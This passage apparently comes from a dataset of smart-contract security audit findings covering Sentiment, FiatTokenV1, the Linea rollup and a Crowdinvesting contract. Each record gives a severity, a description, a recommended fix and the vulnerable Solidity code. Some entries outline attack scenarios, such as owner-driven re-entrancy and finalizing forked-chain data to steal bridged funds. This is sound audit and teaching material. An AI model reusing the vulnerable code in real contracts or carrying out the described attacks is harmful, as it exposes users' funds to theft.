token1's `decimals != 18`\\nConsider normalizing r0 and r1 to 18 decimals before using them in the formula.\\nSentiment Team\\nFixed as recommended. 
PRs here and here.\\nLead Senior Watson\\nConfirmed fix.чWhen the decimals of one or both tokens in the pair is not 18, the price will be way off.ч```\\nfunction getPrice(address pair) external view returns (uint) {\\n (uint r0, uint r1,) = IUniswapV2Pair(pair).getReserves();\\n\\n // 2 * sqrt(r0 * r1 * p0 * p1) / totalSupply\\n return FixedPointMathLib.sqrt(\\n r0\\n .mulWadDown(r1)\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token0()))\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token1()))\\n )\\n .mulDivDown(2e27, IUniswapV2Pair(pair).totalSupply());\\n}\\n```\\n -Tokens received from Curve's `remove_liquidity()` should be added to the assets list even if `_min_amounts` are set to `0`чhighчCurve controller's `canRemoveLiquidity()` should return all the underlying tokens as `tokensIn` rather than only the tokens with `minAmount > 0`.\\n```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n (,uint256[2] memory amounts) = abi.decode(\\n data[4:],\\n (uint256, uint256[2])\\n );\\n\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n uint i; uint j;\\n address[] memory tokensIn = new address[](2);\\n while(i < 2) {\\n if(amounts[i] > 0)\\n tokensIn[j++] = IStableSwapPool(target).coins(i);\\n unchecked { ++i; }\\n }\\n assembly { mstore(tokensIn, j) }\\n\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n\\nThe `amounts` in Curve controller's `canRemoveLiquidity()` represent the \"Minimum `amounts` of underlying coins to receive\", which is used for slippage control.\\nAt L144-149, only the tokens that specified a minAmount > 0 will be added to the `tokensIn` list, which will later be added to the account's assets list.\\nWe believe this is wrong as regardless of the minAmount `remove_liquidity()` will always receive all the underlying tokens.\\nTherefore, it should not check and only add the token when it's minAmount > 
0.ч`canRemoveLiquidity()` can be changed to:\\n```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n address[] memory tokensIn = new address[](2);\\n tokensIn[0] = IStableSwapPool(target).coins(0);\\n tokensIn[1] = IStableSwapPool(target).coins(1);\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.чWhen the user set `_min_amounts` = `0` while removing liquidity from `Curve` and the withdrawn tokens are not in the account's assets list already, the user may get liquidated sooner than expected as `RiskEngine.sol#_getBalance()` only counts in the assets in the assets list.ч```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n (,uint256[2] memory amounts) = abi.decode(\\n data[4:],\\n (uint256, uint256[2])\\n );\\n\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n uint i; uint j;\\n address[] memory tokensIn = new address[](2);\\n while(i < 2) {\\n if(amounts[i] > 0)\\n tokensIn[j++] = IStableSwapPool(target).coins(i);\\n unchecked { ++i; }\\n }\\n assembly { mstore(tokensIn, j) }\\n\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n -Accounts with ETH loans can not be liquidated if LEther's underlying is set to `address(0)`чmediumчSetting `address(0)` as LEther's `underlying` is allowed, and the logic in `AccountManager#settle()` and `RiskEngine#_valueInWei()` handles `address(0)` specially, which implies that `address(0)` can be an asset.\\nHowever, if LEther's underlying is set to `address(0)`, the accounts with ETH loans will become unable to be liquidated.\\nGiven that at `AccountManager.sol#L100` in `settle()` and `RiskEngine.sol#L186` in `_valueInWei()`, they both handled 
the case that the `asset == address(0)`, and in `Registry.sol#setLToken()`, `underlying == address(0)` is allowed:\\nWe assume that `address(0)` can be set as the `underlying` of `LEther`.\\nIn that case, when the user borrows native tokens, `address(0)` will be added to the user's assets and borrows list.\\n```\\nfunction borrow(address account, address token, uint amt)\\n external\\n whenNotPaused\\n onlyOwner(account)\\n{\\n if (registry.LTokenFor(token) == address(0))\\n revert Errors.LTokenUnavailable();\\n if (!riskEngine.isBorrowAllowed(account, token, amt))\\n revert Errors.RiskThresholdBreached();\\n if (IAccount(account).hasAsset(token) == false)\\n IAccount(account).addAsset(token);\\n if (ILToken(registry.LTokenFor(token)).lendTo(account, amt))\\n IAccount(account).addBorrow(token);\\n emit Borrow(account, msg.sender, token, amt);\\n}\\n```\\n\\nThis will later prevent the user from being liquidated because in `riskEngine.isAccountHealthy()`, it calls `_getBalance()` in the for loop of all the assets, which assumes all the assets complies with `IERC20`. 
Thus, the transaction will revert at L157 when calling `IERC20(address(0)).balanceOf(account)`.\\n```\\nfunction liquidate(address account) external {\\n if (riskEngine.isAccountHealthy(account))\\n revert Errors.AccountNotLiquidatable();\\n _liquidate(account);\\n emit AccountLiquidated(account, registry.ownerFor(account));\\n}\\n```\\n\\n```\\nfunction _getBalance(address account) internal view returns (uint) {\\n address[] memory assets = IAccount(account).getAssets();\\n uint assetsLen = assets.length;\\n uint totalBalance;\\n for(uint i; i < assetsLen; ++i) {\\n totalBalance += _valueInWei(\\n assets[i],\\n IERC20(assets[i]).balanceOf(account)\\n );\\n }\\n return totalBalance + account.balance;\\n}\\n```\\nчIssue Accounts with ETH loans can not be liquidated if LEther's underlying is set to `address(0)`\\nConsider removing the misleading logic in `AccountManager#settle()` and `RiskEngine#_valueInWei()` that handles `address(0)` as an asset;\\nConsider disallowing adding `address(0)` as `underlying` in `setLToken()`.\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.чWe noticed that in the deployment documentation, LEther is set to init with WETH as the `underlying`. Therefore, this should not be an issue if the system is being deployed correctly.\\n```\\n1. ETH\\n 1. Deploy LEther implementation\\n 2. Deploy Proxy(LEther)\\n 3. call init(WETH), \"LEther\", \"LEth\", IRegistry, reserveFactor)\\n 4. call Registry.setLToken(WETH, Proxy)\\n 5. call accountManager.toggleCollateralStatus(token)\\n 6. 
call Proxy.initDep()\\n```\\n\\nBut considering that setting `address(0)` as LEther's `underlying` is still plausible and the potential damage to the whole protocol is high (all the accounts with ETH loans can not be liquidated), we believe that this should be a medium severity issue.ч```\\nfunction borrow(address account, address token, uint amt)\\n external\\n whenNotPaused\\n onlyOwner(account)\\n{\\n if (registry.LTokenFor(token) == address(0))\\n revert Errors.LTokenUnavailable();\\n if (!riskEngine.isBorrowAllowed(account, token, amt))\\n revert Errors.RiskThresholdBreached();\\n if (IAccount(account).hasAsset(token) == false)\\n IAccount(account).addAsset(token);\\n if (ILToken(registry.LTokenFor(token)).lendTo(account, amt))\\n IAccount(account).addBorrow(token);\\n emit Borrow(account, msg.sender, token, amt);\\n}\\n```\\n -Missing revert keywordчmediumчMissing `revert` keyword in `functionDelegateCall` bypasses an intended safety check, allowing the function to fail silently.\\nIn the helper function `functionDelegateCall`, there is a check to confirm that the target being called is a contract.\\n```\\nif (!isContract(target)) Errors.AddressNotContract;\\n```\\n\\nHowever, there is a typo in the check that is missing the `revert` keyword.\\nAs a result, non-contracts can be submitted as targets, which will cause the delegatecall below to return success (because EVM treats no code as STOP opcode), even though it doesn't do anything.\\n```\\n(bool success, ) = target.delegatecall(data);\\nrequire(success, \"CALL_FAILED\");\\n```\\nчIssue Missing revert keyword\\nAdd missing `revert` keyword to L70 of Helpers.sol.\\n```\\nif (!isContract(target)) revert Errors.AddressNotContract;\\n```\\n\\nSentiment Team\\nFixed as recommended. 
PR here.\\nLead Senior Watson\\nConfirmed fix.чThe code doesn't accomplish its intended goal of checking to confirm that only contracts are passed as targets, so delegatecalls can silently fail.ч```\\nif (!isContract(target)) Errors.AddressNotContract;\\n```\\n -No Limit for Minting AmountчhighчIn token contract `FiatTokenV1`, there is no limit set for amount of tokens can be minted, as a result, the minter can mint unlimited tokens, disrupting the token supply and value.\\n```\\nfunction mint(address to, uint256 amount) public onlyRole(MINTER\\_ROLE) {\\n \\_mint(to, amount);\\n}\\n```\\nчAdd a limit for the number of tokens the minter can mint.чч```\\nfunction mint(address to, uint256 amount) public onlyRole(MINTER\\_ROLE) {\\n \\_mint(to, amount);\\n}\\n```\\n -Private Key Is Exposed in the Deployment and Upgrade ScriptчhighчIn the contract deploying and upgrading script, private key is used to broadcast the transaction, this would expose private key of the deployer and upgrader account on the machine running the script, therefore compromising these accounts.\\n```\\nuint256 deployerPrivateKey = vm.envUint(\"PRIVATE\\_KEY\");\\n```\\n\\n```\\nuint256 deployerPrivateKey = vm.envUint(\"PRIVATE\\_KEY\");\\nvm.startBroadcast(deployerPrivateKey);\\n```\\nчHave Forge sending a raw transaction to the cold wallet of the account, the wallet signs the transaction then return the signed transactions to Forge and broadcaster. Alternatively use different wallet for deployment and upgrade and stop using the wallet after the script is completeчч```\\nuint256 deployerPrivateKey = vm.envUint(\"PRIVATE\\_KEY\");\\n```\\n -Critical Functions Are Public and Without Access ControlчmediumчCritical functions in RescuableV1(rescue) and `BlacklistableV1` `(blacklist,unblacklist)` are public and unauthenticated, any one can call these function to steal funds and blacklist other accounts. 
Although the child contract `FiatTokenV1` has authenticated the overridden functions and protected them from public access, other contracts inheriting `RescuableV1` and `BlacklistableV1` might have risks from the unauthenticated public functions\\n```\\nfunction rescue(IERC20 token, address to, uint256 amount) public virtual {\\n```\\n\\n```\\nfunction blacklist(address account) public virtual {\\n \\_blacklisted[account] = true;\\n emit Blacklisted(account);\\n}\\n\\n/\\*\\*\\n \\* @dev Removes account from blacklist\\n \\* @param account The address to remove from the blacklist\\n \\*/\\nfunction unBlacklist(address account) public virtual {\\n \\_blacklisted[account] = false;\\n emit UnBlacklisted(account);\\n}\\n```\\nчMake these functions internal, and in the child contract add corresponding public functions with authentication to call the inherited functionsчч```\\nfunction rescue(IERC20 token, address to, uint256 amount) public virtual {\\n```\\n -Unnecessary Parent ContractsчlowчContracts `BlacklistableV1` and `RescuableV1` extend `ContextUpgradeable` and `ERC20Upgradeable`, which are not used in any of the contract functions and are already inherited by the child contract `FiatTokenV1`.\\n```\\nabstract contract BlacklistableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n\\n```\\nabstract contract RescuableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n\\n```\\ncontract FiatTokenV1 is\\n Initializable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20BurnableUpgradeable,\\n AccessControlUpgradeable,\\n ERC20PermitUpgradeable,\\n UUPSUpgradeable,\\n BlacklistableV1,\\n RescuableV1\\n{\\n```\\nчRemove the unnecessary parent contractsчч```\\nabstract contract BlacklistableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n -Redundant _disableInitializers in ConstructorчlowчContract `FiatTokenV1` inherits from contracts `BlacklistableV1` and `RescuableV1`, the two parent contracts both have 
`_disableInitializers` in their constructors to prevent uninitialized contract being initialized by the attackers, it's not necessary to have `_disableInitializers` in the FiatTokenV1's constructor, which is redundant and inefficient.\\n```\\nconstructor() {\\n \\_disableInitializers();\\n}\\n```\\nчRemove constructor from `FiatTokenV1`чч```\\nconstructor() {\\n \\_disableInitializers();\\n}\\n```\\n -Incorrect Final Block Number Can Be FinalizedчhighчIn the data finalization function `finalizeCompressedBlocksWithProof`, `finalizationData.finalBlockNumber` is the final block number of the compressed block data to be finalized. However, there is no check in the contract or the prover to ensure `finalBlockNumber` is correct when there is no new data submitted in the finalization, i.e., `submissionDataLength == 0` . The prover can submit an incorrect final block number and, as a result, the finalized block number (currentL2BlockNumber) would be incorrect. Consequently, the prover can skip block data in the finalization.\\n```\\ncurrentL2BlockNumber = \\_finalizationData.finalBlockNumber;\\n```\\n\\n```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\nчResolution\\nfixed by adding a recommended check of `finalBlockNumber` matching the last block number of the submitted data in `_finalizeCompressedBlocks` and a check in the prover and adding `finalBlockNumber` and `lastFinalizedBlockNumber` in the public input of the verifier in the finalization in PR-24\\nIn `_finalizeCompressedBlocks`, check if `finalBlockNumber` is equal to the last block number (finalBlockInData) of the last item of submitted block data. 
Another solution is to have the prover show that `finalBlockNumber` is correct in the proof by providing the last finalized block number (lastFinalizedBlockNumber) and verify it by adding `finalBlockNumber` and `lastFinalizedBlockNumber` in the public input of the verifier in the finalization.чч```\\ncurrentL2BlockNumber = \\_finalizationData.finalBlockNumber;\\n```\\n -Finalization Fails for the First Batch of Data Submitted After Migration to the Updated ContractчhighчWhen submitting the initial batch of compressed block data after the contract update, the finalization will fail.\\nIn function `_finalizeCompressedBlocks`, `startingDataParentHash = dataParents[_finalizationData.dataHashes[0]]` will be empty and, therefore, `startingParentFinalStateRootHash = dataFinalStateRootHashes[startingDataParentHash]` will be empty too. The check `_finalizationData.parentStateRootHash == stateRootHashes[currentL2BlockNumber]` requires `_finalizationData.parentStateRootHash == _initialStateRootHash`, which is not empty, so the condition `startingParentFinalStateRootHash != _finalizationData.parentStateRootHash` is true, and we revert with the error FinalStateRootHashDoesNotMatch:\\n```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\n\\n```\\nif (finalizationDataDataHashesLength != 0) {\\n bytes32 startingDataParentHash = dataParents[\\_finalizationData.dataHashes[0]];\\n\\n if (startingDataParentHash != \\_finalizationData.dataParentHash) {\\n revert ParentHashesDoesNotMatch(startingDataParentHash, \\_finalizationData.dataParentHash);\\n }\\n\\n bytes32 startingParentFinalStateRootHash = dataFinalStateRootHashes[startingDataParentHash];\\n\\n if (startingParentFinalStateRootHash != \\_finalizationData.parentStateRootHash) {\\n revert FinalStateRootHashDoesNotMatch(startingParentFinalStateRootHash, \\_finalizationData.parentStateRootHash);\\n }\\n```\\nчSet the correct initial value 
for `dataFinalStateRootHashes` for the initial batch of compressed block data.чч```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\n -Prover Can Censor L2 → L1 Messages Partially AddressedчhighчIn L2 → L1 messaging, messages are grouped and added to a Merkle tree by the prover. During finalization, the operator (coordinator) submits the Merkle root to L1, and the user SDK rebuilds the tree to which the message is added and generates a Merkle proof to claim against the root finalized on L1. However, the prover can skip messages when building the tree. Consequently, the user cannot claim the skipped message, which might result in frozen funds.\\nCurrently, the prover is a single entity owned by Linea. Hence, this would require malice or negligence on Linea's part.\\n```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n\\_anchorL2MessagingBlocks(\\_finalizationData.l2MessagingBlocksOffsets, lastFinalizedBlock);\\n```\\nчDecentralize the prover, so messages can be included by different provers.чч```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n\\_anchorL2MessagingBlocks(\\_finalizationData.l2MessagingBlocksOffsets, lastFinalizedBlock);\\n```\\n -Malicious Operator Might Finalize Data From a Forked Linea ChainчhighчA malicious operator (prover) can add and finalize block data from a forked Linea chain, so transactions on the forked chain can be finalized, causing a loss of funds from the L1.\\nFor example, a malicious operator forks the canonical chain, then the attacker sends the forked chain Ether to L1 with `sendMessage` from the forked L2. The operator then submits the block data to L1 and finalizes it with `finalizeCompressedBlocksWithProof`, using the finalization data and proof from the forked chain. 
(Note that the malicious prover sets the forked chain `chainId` in its circuit as a constant.) The L1 contract (LineaRollup) doesn't know whether the data and the proof are from the canonical L2 or the forked one. The finalization succeeds, and the attacker can claim the bridged forked chain Ether and steal funds from L1.\\nAs there is currently only one operator and it is owned by the Linea team, this kind of attack is unlikely to happen. However, when the operator and the coordinator are decentralized, the likelihood of this attack increases.\\n```\\nuint256 publicInput = uint256(\\n keccak256(\\n abi.encode(\\n shnarf,\\n \\_finalizationData.parentStateRootHash,\\n \\_finalizationData.lastFinalizedTimestamp,\\n \\_finalizationData.finalBlockNumber,\\n \\_finalizationData.finalTimestamp,\\n \\_finalizationData.l1RollingHash,\\n \\_finalizationData.l1RollingHashMessageNumber,\\n keccak256(abi.encodePacked(\\_finalizationData.l2MerkleRoots))\\n )\\n```\\n\\n```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n```\\nчAdd `chainId` in the `FinalizationData` as a public input of the verifier function `_verifyProof`, so the proof from the forked Linea chain will not pass the verification because the `chainId` won't match.чч```\\nuint256 publicInput = uint256(\\n keccak256(\\n abi.encode(\\n shnarf,\\n \\_finalizationData.parentStateRootHash,\\n \\_finalizationData.lastFinalizedTimestamp,\\n \\_finalizationData.finalBlockNumber,\\n \\_finalizationData.finalTimestamp,\\n \\_finalizationData.l1RollingHash,\\n \\_finalizationData.l1RollingHashMessageNumber,\\n keccak256(abi.encodePacked(\\_finalizationData.l2MerkleRoots))\\n )\\n```\\n -The Compressed Block Data Is Not Verified Against Data in the Prover During Data Submission AcknowledgedчmediumчWhen the sequencer submits the batched block data with the `submitData` function, it's expected to check that the submitted commitment of the compressed block data 
`keccak(_submissionData.compressedData)` and the commitment of the block data used in the prover (snarkHash) commit to the same data. This is done by proof of equivalence; the `x` is calculated by hashing `keccak(_submissionData.compressedData)` and `snarkHash`, and `y` is provided by the prover. Then it's verified that `P(x) = y`, where `P` is a polynomial that encodes the compressed data (_submissionData.compressedData). However, in the `submitData` function, `y` is evaluated by `_calculateY` but it is not checked against the `y` provided by the prover. In fact, the prover doesn't provide `y` to the function; instead `x` and `y` are provided to the prover who would evaluate `y'` and compare it with `y` from the contract, then `x` and `y` are included in the public input for the proof verification in the finalization.\\n```\\nshnarf = keccak256(\\n abi.encode(\\n shnarf,\\n _submissionData.snarkHash,\\n _submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n _calculateY(_submissionData.compressedData, compressedDataComputedX)\\n )\\n ); \\n```\\n\\nThe only difference is if the two commitments don't commit to the same block data (meaning the data submitted doesn't match the data used in the prover), `submitData` would fail - while in the current implementation, it would fail in the proof verification during the finalization. As a result, if the data submitted doesn't match the data in the prover in the finalization, the operator has to submit the correct data again in order to finalize it. 
Linea stated they will verify it in the data submission, once EIP-4844 is implemented.\\n```\\nfunction \\_submitData(SubmissionData calldata \\_submissionData) internal returns (bytes32 shnarf) {\\n shnarf = dataShnarfHashes[\\_submissionData.dataParentHash];\\n\\n bytes32 parentFinalStateRootHash = dataFinalStateRootHashes[\\_submissionData.dataParentHash];\\n uint256 lastFinalizedBlock = currentL2BlockNumber;\\n\\n if (\\_submissionData.firstBlockInData <= lastFinalizedBlock) {\\n revert FirstBlockLessThanOrEqualToLastFinalizedBlock(\\_submissionData.firstBlockInData, lastFinalizedBlock);\\n }\\n\\n if (\\_submissionData.firstBlockInData > \\_submissionData.finalBlockInData) {\\n revert FirstBlockGreaterThanFinalBlock(\\_submissionData.firstBlockInData, \\_submissionData.finalBlockInData);\\n }\\n\\n if (\\_submissionData.parentStateRootHash != parentFinalStateRootHash) {\\n revert StateRootHashInvalid(parentFinalStateRootHash, \\_submissionData.parentStateRootHash);\\n }\\n\\n bytes32 currentDataHash = keccak256(\\_submissionData.compressedData);\\n\\n if (dataFinalStateRootHashes[currentDataHash] != EMPTY\\_HASH) {\\n revert DataAlreadySubmitted(currentDataHash);\\n }\\n\\n dataParents[currentDataHash] = \\_submissionData.dataParentHash;\\n dataFinalStateRootHashes[currentDataHash] = \\_submissionData.finalStateRootHash;\\n\\n bytes32 compressedDataComputedX = keccak256(abi.encode(\\_submissionData.snarkHash, currentDataHash));\\n\\n shnarf = keccak256(\\n abi.encode(\\n shnarf,\\n \\_submissionData.snarkHash,\\n \\_submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n \\_calculateY(\\_submissionData.compressedData, compressedDataComputedX)\\n )\\n );\\n\\n dataShnarfHashes[currentDataHash] = shnarf;\\n\\n emit DataSubmitted(currentDataHash, \\_submissionData.firstBlockInData, \\_submissionData.finalBlockInData);\\n}\\n```\\n\\n```\\nfunction \\_calculateY(\\n bytes calldata \\_data,\\n bytes32 \\_compressedDataComputedX\\n) internal pure returns 
(bytes32 compressedDataComputedY) {\\n if (\\_data.length % 0x20 != 0) {\\n revert BytesLengthNotMultipleOf32();\\n }\\n\\n bytes4 errorSelector = ILineaRollup.FirstByteIsNotZero.selector;\\n assembly {\\n for {\\n let i := \\_data.length\\n } gt(i, 0) {\\n\\n } {\\n i := sub(i, 0x20)\\n let chunk := calldataload(add(\\_data.offset, i))\\n if iszero(iszero(and(chunk, 0xFF00000000000000000000000000000000000000000000000000000000000000))) {\\n let ptr := mload(0x40)\\n mstore(ptr, errorSelector)\\n revert(ptr, 0x4)\\n }\\n compressedDataComputedY := addmod(\\n mulmod(compressedDataComputedY, \\_compressedDataComputedX, Y\\_MODULUS),\\n chunk,\\n Y\\_MODULUS\\n )\\n }\\n }\\n}\\n```\\nчAdd the compressed block data verification in the `submitData` function.чч```\\nshnarf = keccak256(\\n abi.encode(\\n shnarf,\\n _submissionData.snarkHash,\\n _submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n _calculateY(_submissionData.compressedData, compressedDataComputedX)\\n )\\n ); \\n```\\n -Empty Compressed Data Allowed in Data SubmissionчmediumчIn `submitData`, the coordinator can submit data with empty `compressedData` in `_submissionData`, which is not a desired purpose of this function and may cause undefined system behavior.\\n```\\nfunction submitData(\\n SubmissionData calldata \\_submissionData\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n \\_submitData(\\_submissionData);\\n}\\n```\\nчAdd a check to disallow data submission with empty `compressedData`.чч```\\nfunction submitData(\\n SubmissionData calldata \\_submissionData\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n \\_submitData(\\_submissionData);\\n}\\n```\\n -Limiting the Price in the buy and onTokenTransfer FunctionsчmediumчWhen an investor tries to `buy` the tokens in the `Crowdinvesting` 
contract, the `buy` function does not allow to limit the amount of tokens that can be spent during this particular transaction:\\n```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n```\\n\\nThe owner of the price oracle can front-run the transaction and twist the price.\\nOf course, the buyer can try to regulate that limit with the token allowance, but there may be some exceptions. Sometimes, users want to give more allowance and buy in multiple transactions over time. Or even give an infinite allowance (not recommended) out of convenience.\\nThe same issue can be found in the `onTokenTransfer` function. This function works differently because the amount of currency is fixed, and the amount of tokens minted is undefined. Because of that, limiting the allowance won't help, so the user doesn't know how many tokens can be bought.чIt's recommended to explicitly limit the amount of tokens that can be transferred from the buyer for the `buy` function. And allow users to define a minimal amount of tokens bought in the `onTokenTransfer` function.чч```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. 
Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n```\\n -Potential Re-Entrancy Attack in the Crowdinvesting ContractчlowчThe attack requires a set of pre-requisites:\\nThe currency token should have a re-entrancy opportunity inside the token transfer.\\nThe re-entrancy can be done on a token transfer from the `_msgSender()` to the `feeCollector`, so there are not a lot of attackers who can potentially execute it.\\nThe owner should be involved in the attack, so it's most likely an attack by the owner.\\n```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n\\n (uint256 fee, address feeCollector) = \\_getFeeAndFeeReceiver(currencyAmount);\\n if (fee != 0) {\\n currency.safeTransferFrom(\\_msgSender(), feeCollector, fee);\\n }\\n\\n currency.safeTransferFrom(\\_msgSender(), currencyReceiver, currencyAmount - fee);\\n \\_checkAndDeliver(\\_amount, \\_tokenReceiver);\\n\\n emit TokensBought(\\_msgSender(), \\_amount, currencyAmount);\\n}\\n```\\n\\nSo on the token transfer to the `feeCollector` above, the `currency` parameter can be changed by the `owner`. And the following token transfer (currency.safeTransferFrom(_msgSender(), currencyReceiver, currencyAmount - fee);) will be made in a different `currency`.\\nA possible scenario of the attack could look as follows:\\nMalicious owner sells tokens for a valuable currency. 
People are placing allowance for the tokens.\\nThe owner changes the currency to a new one with a much lower price and re-entrancy during transfer.\\nWhen a victim wants to buy tokens, the owner reenters on fee transfer and returns the old currency.\\nThe victim transfers the updated currency that is more expensive.чSave the currency in memory at the beginning of the function and use it further.чч```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n\\n (uint256 fee, address feeCollector) = \\_getFeeAndFeeReceiver(currencyAmount);\\n if (fee != 0) {\\n currency.safeTransferFrom(\\_msgSender(), feeCollector, fee);\\n }\\n\\n currency.safeTransferFrom(\\_msgSender(), currencyReceiver, currencyAmount - fee);\\n \\_checkAndDeliver(\\_amount, \\_tokenReceiver);\\n\\n emit TokensBought(\\_msgSender(), \\_amount, currencyAmount);\\n}\\n```\\n -Lack of Validation of PrivateOffer Initialization ParametersчlowчThe `PrivateOffer` contract allows to create a customised deal for a specific investor. The `initialize()` function receives parameters to set up the `PrivateOffer` accordingly.\\nThe following parameters lack of validation during initialization:\\n`tokenAmount`\\n`token`\\n`currency`\\n`tokenAmount`\\n```\\nuint256 currencyAmount = Math.ceilDiv(\\n \\_arguments.tokenAmount \\* \\_arguments.tokenPrice,\\n 10 \\*\\* \\_arguments.token.decimals()\\n);\\n```\\n\\n`tokenAmount` is not validated at all. It should be verified to be greater than zero.\\n`token`\\n`token` is not validated at all. It should be verified to be different than zero address.\\n`currency`\\n`currency` is not validated at all. The documentation mentions a restricted list of supported currencies. 
It should be enforced by checking this parameter against a whitelist of `currency` addresses.чEnhance the validation of the following parameters: `tokenAmount`, `token`, `currency`.чч```\\nuint256 currencyAmount = Math.ceilDiv(\\n \\_arguments.tokenAmount \\* \\_arguments.tokenPrice,\\n 10 \\*\\* \\_arguments.token.decimals()\\n);\\n```\\n -Lack of Validation of Crowdinvesting Initialization ParametersчlowчThe `Crowdinvesting` contract allows everyone who meets the requirements to buy tokens at a fixed price. The `initialize()` function receives parameters to set up the `Crowdinvesting` accordingly.\\nThe following parameters lack of validation during initialization:\\n`tokenPrice`\\n`minAmountPerBuyer`\\n`lastBuyDate`\\n`currency`\\n`tokenPrice`\\n```\\nrequire(\\_arguments.tokenPrice != 0, \"\\_tokenPrice needs to be a non-zero amount\");\\n```\\n\\n`tokenPrice` is checked to be different to zero. It should be verified to be in between `priceMin` and `priceMax` when these parameters are provided.\\n`minAmountPerBuyer`\\n```\\nrequire(\\n \\_arguments.minAmountPerBuyer <= \\_arguments.maxAmountPerBuyer,\\n \"\\_minAmountPerBuyer needs to be smaller or equal to \\_maxAmountPerBuyer\"\\n);\\n```\\n\\n`minAmountPerBuyer` is checked to be below or equal to `maxAmountPerBuyer`. It should be verified to not be zero.\\n`lastBuyDate`\\n```\\nlastBuyDate = \\_arguments.lastBuyDate;\\n```\\n\\n`lastBuyDate` is not validated at all. It should be verified to be greater than the current `block.timestamp`. 
Currently, a `Crowdinvesting` contract with `lastBuyDate` parameter set to a value (different than zero) below `block.timestamp` will not be able to sell any token.\\n```\\nfunction \\_checkAndDeliver(uint256 \\_amount, address \\_tokenReceiver) internal {\\n require(tokensSold + \\_amount <= maxAmountOfTokenToBeSold, \"Not enough tokens to sell left\");\\n require(tokensBought[\\_tokenReceiver] + \\_amount >= minAmountPerBuyer, \"Buyer needs to buy at least minAmount\");\\n require(\\n tokensBought[\\_tokenReceiver] + \\_amount <= maxAmountPerBuyer,\\n \"Total amount of bought tokens needs to be lower than or equal to maxAmount\"\\n );\\n\\n if (lastBuyDate != 0 && block.timestamp > lastBuyDate) {\\n revert(\"Last buy date has passed: not selling tokens anymore.\");\\n }\\n\\n tokensSold += \\_amount;\\n tokensBought[\\_tokenReceiver] += \\_amount;\\n\\n token.mint(\\_tokenReceiver, \\_amount);\\n}\\n```\\n\\n`currency`\\n```\\nrequire(address(\\_arguments.currency) != address(0), \"currency can not be zero address\");\\n```\\n\\n`currency` is checked to be different than zero. The documentation mentions a restricted list of supported currencies. 
